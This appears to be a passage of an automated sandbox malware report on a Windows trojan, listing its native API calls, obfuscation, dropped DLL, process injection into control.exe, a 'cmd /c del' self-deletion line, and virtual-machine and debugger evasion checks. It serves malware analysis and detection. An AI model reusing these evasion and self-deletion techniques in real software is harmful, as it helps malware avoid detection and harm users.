Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A095D0 NtClose,LdrInitializeThunk, 2_2_00A095D0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09540 NtReadFile,LdrInitializeThunk, 2_2_00A09540
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A096E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_00A096E0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_00A09660
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A097A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_00A097A0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09780 NtMapViewOfSection,LdrInitializeThunk, 2_2_00A09780
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09FE0 NtCreateMutant,LdrInitializeThunk, 2_2_00A09FE0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09710 NtQueryInformationToken,LdrInitializeThunk, 2_2_00A09710
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A098A0 NtWriteVirtualMemory, 2_2_00A098A0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09820 NtEnumerateKey, 2_2_00A09820
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A0B040 NtSuspendThread, 2_2_00A0B040
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A099D0 NtCreateProcessEx, 2_2_00A099D0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09950 NtQueueApcThread, 2_2_00A09950
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09A80 NtOpenDirectoryObject, 2_2_00A09A80
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09A10 NtQuerySection, 2_2_00A09A10
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A0A3B0 NtGetContextThread, 2_2_00A0A3B0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09B00 NtSetValueKey, 2_2_00A09B00
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A095F0 NtQueryInformationFile, 2_2_00A095F0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09520 NtWaitForSingleObject, 2_2_00A09520
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A0AD30 NtSetContextThread, 2_2_00A0AD30
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09560 NtWriteFile, 2_2_00A09560
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A096D0 NtCreateKey, 2_2_00A096D0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09610 NtEnumerateValueKey, 2_2_00A09610
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09670 NtQueryInformationProcess, 2_2_00A09670
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09650 NtQueryValueKey, 2_2_00A09650
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09730 NtQueryVirtualMemory, 2_2_00A09730
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A0A710 NtOpenProcessToken, 2_2_00A0A710
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09760 NtOpenProcess, 2_2_00A09760
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A09770 NtSetInformationFile, 2_2_00A09770
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A0A770 NtOpenThread, 2_2_00A0A770
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399540 NtReadFile,LdrInitializeThunk, 14_2_04399540
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043995D0 NtClose,LdrInitializeThunk, 14_2_043995D0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399660 NtAllocateVirtualMemory,LdrInitializeThunk, 14_2_04399660
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399650 NtQueryValueKey,LdrInitializeThunk, 14_2_04399650
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043996E0 NtFreeVirtualMemory,LdrInitializeThunk, 14_2_043996E0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043996D0 NtCreateKey,LdrInitializeThunk, 14_2_043996D0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399710 NtQueryInformationToken,LdrInitializeThunk, 14_2_04399710
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399780 NtMapViewOfSection,LdrInitializeThunk, 14_2_04399780
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399FE0 NtCreateMutant,LdrInitializeThunk, 14_2_04399FE0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399860 NtQuerySystemInformation,LdrInitializeThunk, 14_2_04399860
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399840 NtDelayExecution,LdrInitializeThunk, 14_2_04399840
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399910 NtAdjustPrivilegesToken,LdrInitializeThunk, 14_2_04399910
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043999A0 NtCreateSection,LdrInitializeThunk, 14_2_043999A0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399A50 NtCreateFile,LdrInitializeThunk, 14_2_04399A50
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0439AD30 NtSetContextThread, 14_2_0439AD30
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399520 NtWaitForSingleObject, 14_2_04399520
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399560 NtWriteFile, 14_2_04399560
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043995F0 NtQueryInformationFile, 14_2_043995F0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399610 NtEnumerateValueKey, 14_2_04399610
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399670 NtQueryInformationProcess, 14_2_04399670
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399730 NtQueryVirtualMemory, 14_2_04399730
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0439A710 NtOpenProcessToken, 14_2_0439A710
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0439A770 NtOpenThread, 14_2_0439A770
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399770 NtSetInformationFile, 14_2_04399770
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399760 NtOpenProcess, 14_2_04399760
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043997A0 NtUnmapViewOfSection, 14_2_043997A0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399820 NtEnumerateKey, 14_2_04399820
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0439B040 NtSuspendThread, 14_2_0439B040
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043998A0 NtWriteVirtualMemory, 14_2_043998A0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043998F0 NtReadVirtualMemory, 14_2_043998F0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399950 NtQueueApcThread, 14_2_04399950
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043999D0 NtCreateProcessEx, 14_2_043999D0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399A20 NtResumeThread, 14_2_04399A20
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399A10 NtQuerySection, 14_2_04399A10
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399A00 NtProtectVirtualMemory, 14_2_04399A00
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399A80 NtOpenDirectoryObject, 14_2_04399A80
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04399B00 NtSetValueKey, 14_2_04399B00
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0439A3B0 NtGetContextThread, 14_2_0439A3B0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_001E85F0 NtCreateFile, 14_2_001E85F0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_001E86A0 NtReadFile, 14_2_001E86A0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_001E8720 NtClose, 14_2_001E8720
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_001E87D0 NtAllocateVirtualMemory, 14_2_001E87D0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_001E85EA NtCreateFile, 14_2_001E85EA
Sample file is different than original file name gathered from version info
Source: 5tCYPTkM6b.exe, 00000000.00000003.268713212.000000001B1CF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 5tCYPTkM6b.exe
Source: 5tCYPTkM6b.exe, 00000000.00000003.266191041.000000001B036000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 5tCYPTkM6b.exe
Source: 5tCYPTkM6b.exe, 00000002.00000002.332790089.0000000000ABF000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 5tCYPTkM6b.exe
Source: 5tCYPTkM6b.exe, 00000002.00000002.332526173.0000000000955000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCONTROL.EXEj% vs 5tCYPTkM6b.exe
Source: 5tCYPTkM6b.exe, 00000002.00000002.333320879.0000000000C4F000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 5tCYPTkM6b.exe
Source: 5tCYPTkM6b.exe Virustotal: Detection: 39%
Source: 5tCYPTkM6b.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe File read: C:\Users\user\Desktop\5tCYPTkM6b.exe Jump to behavior
Source: 5tCYPTkM6b.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\5tCYPTkM6b.exe "C:\Users\user\Desktop\5tCYPTkM6b.exe"
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Process created: C:\Users\user\Desktop\5tCYPTkM6b.exe "C:\Users\user\Desktop\5tCYPTkM6b.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\5tCYPTkM6b.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Process created: C:\Users\user\Desktop\5tCYPTkM6b.exe "C:\Users\user\Desktop\5tCYPTkM6b.exe" Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\5tCYPTkM6b.exe" Jump to behavior
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe File created: C:\Users\user~1\AppData\Local\Temp\nsiD4B2.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/4@11/3
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar, 0_2_00402012
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 0_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_00404275
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Binary string: wntdll.pdbUGP source: 5tCYPTkM6b.exe, 00000000.00000003.267437661.000000001B0B0000.00000004.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000000.00000003.264871766.000000001AF20000.00000004.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000002.00000002.332790089.0000000000ABF000.00000040.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000002.00000002.332546161.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000003.334008082.0000000004190000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524788773.000000000444F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524438150.0000000004330000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: control.pdb source: 5tCYPTkM6b.exe, 00000002.00000002.332518293.0000000000950000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: 5tCYPTkM6b.exe, 5tCYPTkM6b.exe, 00000002.00000002.332790089.0000000000ABF000.00000040.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000002.00000002.332546161.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, control.exe, control.exe, 0000000E.00000003.334008082.0000000004190000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524788773.000000000444F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524438150.0000000004330000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: control.pdbUGP source: 5tCYPTkM6b.exe, 00000002.00000002.332518293.0000000000950000.00000040.10000000.00040000.00000000.sdmp

Data Obfuscation
barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_0041B832 push eax; ret 2_2_0041B838
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_0041B83B push eax; ret 2_2_0041B8A2
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_004160CB push edx; ret 2_2_004160CD
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_0041B8D6 push ebp; ret 2_2_0041B8F1
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_0041B8F3 push ebp; ret 2_2_0041B8F1
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_0041B89C push eax; ret 2_2_0041B8A2
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_0041C134 push ebp; ret 2_2_0041B8F1
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00407265 push cs; iretd 2_2_0040726E
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_004152C7 push edx; retf 2_2_004152C8
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_0041537D push ebp; retf 2_2_0041537E
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_0041C5DD push ebp; ret 2_2_0041B8F1
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00415F76 push ds; iretd 2_2_00415FE3
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_0041B7E5 push eax; ret 2_2_0041B838
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00408783 push ecx; iretd 2_2_00408784
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A1D0D1 push ecx; ret 2_2_00A1D0E4
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043AD0D1 push ecx; ret 14_2_043AD0E4
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_001EB83B push eax; ret 14_2_001EB8A2
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_001EB832 push eax; ret 14_2_001EB838
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_001EB89C push eax; ret 14_2_001EB8A2
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_001EB8D6 push ebp; ret 14_2_001EB8F1
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_001E60CB push edx; ret 14_2_001E60CD
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_001D7265 push cs; iretd 14_2_001D726E
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_001E52C7 push edx; retf 14_2_001E52C8
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_001E537D push ebp; retf 14_2_001E537E
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_001E5F76 push ds; iretd 14_2_001E5FE3
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_001D8783 push ecx; iretd 14_2_001D8784
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_001EB7E5 push eax; ret 14_2_001EB838
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00405DA3

Persistence and Installation Behavior
barindex
Drops PE files
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe File created: C:\Users\user\AppData\Local\Temp\nsiD4B4.tmp\npsx.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\control.exe Process created: /c del "C:\Users\user\Desktop\5tCYPTkM6b.exe"
Source: C:\Windows\SysWOW64\control.exe Process created: /c del "C:\Users\user\Desktop\5tCYPTkM6b.exe" Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 00000000001D8614 second address: 00000000001D861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 00000000001D89AE second address: 00000000001D89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5672 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 7144 Thread sleep time: -34000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_004088E0 rdtsc 2_2_004088E0
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\control.exe API coverage: 9.7 %
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 0_2_00405D7C FindFirstFileA,FindClose, 0_2_00405D7C
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_004053AA
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 0_2_00402630 FindFirstFileA, 0_2_00402630
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000004.00000000.281905557.0000000008C73000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.302266423.0000000008A32000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000004.00000000.302266423.0000000008A32000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.281437629.0000000008B88000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.281437629.0000000008B88000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000004.00000000.297278556.00000000048E0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.281437629.0000000008B88000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 00000004.00000000.315675914.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000004.00000000.315675914.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000004.00000000.299091011.00000000069DA000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD002

Anti Debugging
barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00405DA3
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_004088E0 rdtsc 2_2_004088E0
Enables debug privileges
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 0_2_021E0402 mov eax, dword ptr fs:[00000030h] 0_2_021E0402
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 0_2_021E0616 mov eax, dword ptr fs:[00000030h] 0_2_021E0616
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 0_2_021E0706 mov eax, dword ptr fs:[00000030h] 0_2_021E0706
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 0_2_021E0744 mov eax, dword ptr fs:[00000030h] 0_2_021E0744
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 0_2_021E06C7 mov eax, dword ptr fs:[00000030h] 0_2_021E06C7
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A090AF mov eax, dword ptr fs:[00000030h] 2_2_00A090AF
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009C9080 mov eax, dword ptr fs:[00000030h] 2_2_009C9080
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009FF0BF mov ecx, dword ptr fs:[00000030h] 2_2_009FF0BF
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009FF0BF mov eax, dword ptr fs:[00000030h] 2_2_009FF0BF
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009FF0BF mov eax, dword ptr fs:[00000030h] 2_2_009FF0BF
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A43884 mov eax, dword ptr fs:[00000030h] 2_2_00A43884
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A43884 mov eax, dword ptr fs:[00000030h] 2_2_00A43884
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00A5B8D0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A5B8D0 mov ecx, dword ptr fs:[00000030h] 2_2_00A5B8D0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00A5B8D0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00A5B8D0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00A5B8D0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00A5B8D0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A47016 mov eax, dword ptr fs:[00000030h] 2_2_00A47016
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A47016 mov eax, dword ptr fs:[00000030h] 2_2_00A47016
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A47016 mov eax, dword ptr fs:[00000030h] 2_2_00A47016
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h] 2_2_009DB02A
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h] 2_2_009DB02A
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h] 2_2_009DB02A
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h] 2_2_009DB02A
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A94015 mov eax, dword ptr fs:[00000030h] 2_2_00A94015
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A94015 mov eax, dword ptr fs:[00000030h] 2_2_00A94015
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A82073 mov eax, dword ptr fs:[00000030h] 2_2_00A82073
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A91074 mov eax, dword ptr fs:[00000030h] 2_2_00A91074
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009FA185 mov eax, dword ptr fs:[00000030h] 2_2_009FA185
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009EC182 mov eax, dword ptr fs:[00000030h] 2_2_009EC182
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009CB1E1 mov eax, dword ptr fs:[00000030h] 2_2_009CB1E1
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009CB1E1 mov eax, dword ptr fs:[00000030h] 2_2_009CB1E1
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009CB1E1 mov eax, dword ptr fs:[00000030h] 2_2_009CB1E1
